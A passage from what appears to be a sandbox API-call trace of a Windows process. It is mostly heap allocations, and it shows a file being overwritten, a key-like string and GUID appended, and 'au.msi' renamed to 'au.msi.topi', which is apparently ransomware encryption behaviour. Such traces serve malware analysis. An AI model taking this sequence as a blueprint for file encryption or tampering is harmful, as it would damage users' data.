String=0x9ccfa40) returned 0x0 [0098.280] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.280] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x25810) returned 0x9a06a00 [0098.281] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.281] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.281] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.282] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbde8 [0098.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50f0 [0098.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbe30 [0098.283] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.284] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.284] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5150 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5138 [0098.284] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.285] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.285] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.285] GetCurrentThreadId () returned 0x8c4 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fabb0 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df668 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.286] GetCurrentThreadId () returned 0x8c4 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.286] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.286] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5150 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.287] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.287] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5168 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a18 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5138 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.288] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0098.288] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5138 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0098.289] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df668 | out: hHeap=0x680000) returned 1 [0098.289] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5168 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5150 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fbe30 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.290] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0098.291] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.291] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0098.291] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x25800, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x25800, lpOverlapped=0x0) returned 1 [0098.291] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0098.291] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x2d400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.291] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0098.292] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0098.292] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0098.292] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0098.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.292] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0098.292] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.292] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0098.292] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0098.292] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0098.292] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.293] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0098.293] CloseHandle (hObject=0x6a8) returned 1 [0098.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4718 [0098.296] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0098.296] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4718 | out: hHeap=0x680000) returned 1 [0098.296] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi.topi")) returned 1 [0098.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.297] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.297] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0098.299] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 0 [0098.299] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0098.299] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b4718 [0098.299] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.299] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.299] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f25a8 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.300] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0098.300] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.301] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b44b8 | out: hHeap=0x680000) returned 1 [0098.301] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b44b8 